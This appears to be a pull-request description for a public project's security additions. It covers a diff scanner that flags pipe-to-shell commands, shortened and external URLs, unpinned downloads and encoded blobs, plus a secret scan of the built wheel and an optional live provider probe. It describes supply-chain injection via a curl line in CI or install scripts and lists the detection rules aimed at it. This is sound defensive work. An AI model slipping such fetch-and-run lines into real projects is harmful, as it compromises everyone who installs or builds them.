This repository is public, Apache-2.0, takes PRs from anyone, and its own policy is auto-merge except for billing, destructive migrations, RLS and secrets. A line adding a `curl` to a URL shortener inside `.github/workflows/` or `install.sh` passes lint, mypy, pytest, gitleaks and all three audits without touching anything any of them look at.

`scripts/pr_intent_scan.py` — `git diff` and stdlib only, five rules:

| rule | why |
|---|---|
| `pipe-to-shell` | whatever the server sends today, executed. `high` anywhere. |
| `shortened-url` | hides its destination from the reviewer, and can be repointed after merge |
| `external-file-host` | mutable content from outside the supply chain |
| `executable-url` | a download this project does not pin |
| `encoded-blob` | code a reviewer cannot read, in a path that runs |

Severity depends on **where**: the same shortener is `medium` in prose and `high` in a file that executes on somebody else's machine.

`--fail-on high`, not `medium`. These are heuristics with legitimate uses, and a gate that stops a build over a shortened link in a comment is a gate somebody switches off — after which it guards nothing. **Seven must-not-flag cases** carry as much weight as the five that must, including the sharpest pair: a 200-character blob is a finding in `scripts/` and a fixture in `tests/`, because only one of those runs on CI.

`--unified=0`, so context is never read as an addition — otherwise every PR touching a file near an existing `curl` inherits that line's finding.

## 26 · Nothing read the wheel

`publish.yml` already opens it with `zipfile` — and reads only `namelist()`, to confirm one entry is present. The bytes were never looked at.

`gitleaks` covers the git history with `fetch-depth: 0`, which is the right scope for the *source*. It does not cover what `hatch_build.py` force-includes, nor `apps/desktop/dist` built by an earlier job and downloaded here as an artifact — both assembled **after** the last commit and shipped to everyone.

Reuses `chimera.core.redact`'s `_PATTERNS` rather than a second list: a second list drifts from the first, and the first is the one with tests. Plus three strings specific to this deployment that have no shape (a hostname, an SSH key name, a state directory).

## 28 · `doctor` said Ready without ever calling a provider

It read `configured_providers()`, which reads **names**. The comment two lines above already admits it:

> a typo'd `GROK_API_KEY` is indistinguishable from a provider

So a revoked key, an account with no credit, or a value pasted with a trailing space all passed the command called *doctor*, and failed on the first real call — which on this deployment is a cron at three in the morning. The argument for measuring is already written in this project, in `config_api.pricing_capability`: the time to find out is while reading the doctor.

`--probe` is **off by default** — instant, offline and free is why anyone runs `doctor` first. The default line now says what it checked. The probe's failure goes through `redact`, because a provider's error body carries an echoed prompt and its own routing trace, and printing it raw would make the diagnostic the leak.

---

## Verification

Both scanners exclude themselves **by path**, never by a marker comment — a marker is something a contributor can copy into the file they are adding, which turns the exemption into the attack. The intent scanner's first real run against this very branch flagged its own test suite in nine places, which is how the second exclusion was found.

One measurement of mine was wrong along the way. The exit code read as `0` through the WSL wrapper, which looked like a gate that reports and never stops the build — until a `sys.exit(7)` control read `0` too. The apparatus was broken, not the script:

```
controle: NAO-ZERO (certo)
scanner: NAO-ZERO — o portao para o build
```

`4579 passed, 18 skipped` · ruff (including `scripts/`) and mypy clean · CLI snapshot and `docs/commands.md` regenerated for the new flag.

🤖 Generated with [Claude Code](https://claude.com/claude-code)